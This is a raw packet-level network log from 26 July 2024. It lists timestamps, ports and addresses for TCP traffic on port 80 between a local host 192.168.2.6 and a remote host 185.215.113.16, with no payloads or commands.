Jul 26, 2024 12:57:06.432471991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432497978 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432511091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432524920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432533979 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432548046 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432554960 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432569981 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432575941 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432590008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432598114 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432612896 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432616949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432635069 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432641983 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.432655096 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.432679892 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433347940 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433368921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433393955 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433396101 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433403969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433417082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433434010 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433438063 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433449984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433459044 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433474064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433480024 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433494091 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433495998 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433517933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433525085 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.433530092 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.433562040 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434470892 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434490919 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434514999 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434520006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434530020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434537888 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434556007 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434560061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434567928 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434582949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434601068 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434604883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434623003 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434627056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434634924 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434648991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.434668064 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.434689999 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.435086966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.435106993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.435132027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.435136080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.435146093 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.435157061 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.435167074 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.435178995 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.435198069 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.435219049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.441555023 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.441615105 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.441687107 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.441700935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.441730022 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.441740036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.441750050 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.441770077 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.441787958 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.441808939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.442096949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.442116976 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.442140102 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.442141056 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.442148924 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.442177057 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504585981 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504607916 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504616022 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504622936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504631996 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504640102 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504647970 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504654884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504663944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504669905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504678011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504693031 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504700899 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504708052 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504714966 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504748106 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504776001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504807949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504851103 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504879951 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504894972 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504904032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504914999 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504920006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504920006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504920959 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504920959 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504945993 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504959106 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504959106 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504961014 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.504987955 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.504990101 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505004883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505014896 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505028009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505034924 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505043983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505049944 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505076885 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505079031 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505091906 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505100012 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505120039 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505142927 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505333900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505356073 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505379915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505393028 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505393028 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505400896 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.505429029 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.505455017 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.520565987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.520587921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.520597935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.520739079 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.520894051 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.520956039 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.520981073 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521003008 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521084070 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521084070 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521084070 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521084070 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521342039 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521389961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521426916 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521449089 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521473885 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521491051 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521675110 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521693945 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521718025 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521719933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521730900 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521744013 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.521758080 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.521785975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522053003 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522074938 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522094011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522104979 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522119045 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522119045 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522139072 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522145033 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522161961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522165060 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522185087 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522192001 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522207975 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522233009 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522933960 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522953987 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522978067 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.522991896 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.522998095 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523013115 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523017883 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523040056 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523041010 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523061991 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523063898 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523083925 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523089886 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523123026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523139954 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523471117 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523523092 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523673058 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523690939 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523714066 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523720026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523735046 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523746967 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523756027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523766994 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523778915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523791075 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523796082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523807049 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523819923 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.523824930 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523848057 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.523869038 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524602890 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524621964 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524643898 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524653912 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524662971 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524673939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524686098 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524694920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524704933 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524720907 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524734020 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524746895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524760008 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524766922 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524787903 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.524795055 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524816990 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.524849892 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525490046 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525511980 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525532961 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525537968 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525554895 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525557995 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525573969 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525579929 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525588036 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525599957 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525616884 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525624990 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525640011 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525641918 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525655985 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.525656939 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525687933 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.525711060 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526405096 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526423931 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526448011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526451111 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526468039 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526473999 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526493073 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526510954 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526515961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526515961 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526547909 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526549101 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526566982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526567936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526592016 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.526592970 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526602983 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.526631117 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.527211905 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.527231932 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.527255058 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.527276993 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.527276993 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.527287006 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.536819935 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.537033081 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.537146091 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.537184000 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.537208080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.537226915 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.537251949 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.537275076 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.537312984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.537312984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.537312984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.537312984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.537312984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.537312984 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.594021082 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.594105005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.594137907 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.594160080 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.594182968 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.594192028 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.594192982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.594192982 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.594202042 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.594235897 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.594235897 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.594235897 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.594604969 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.594744921 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596118927 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596164942 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596190929 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596287966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596287966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596287966 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596328020 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596374989 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596457005 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596477032 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596535921 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596559048 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596566916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596566916 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596602917 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596602917 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.596836090 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.596894026 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597012997 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597033024 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597059011 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597064018 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597074032 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597081900 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597096920 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597098112 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597119093 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597134113 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597157001 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597160101 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597167969 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597178936 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597189903 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597223997 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597913027 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597933054 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597958088 CEST	80	60778	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:06.597960949 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597979069 CEST	60778	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:06.597980976 CEST	80	60778	185.215.113.16	192.168.2.6
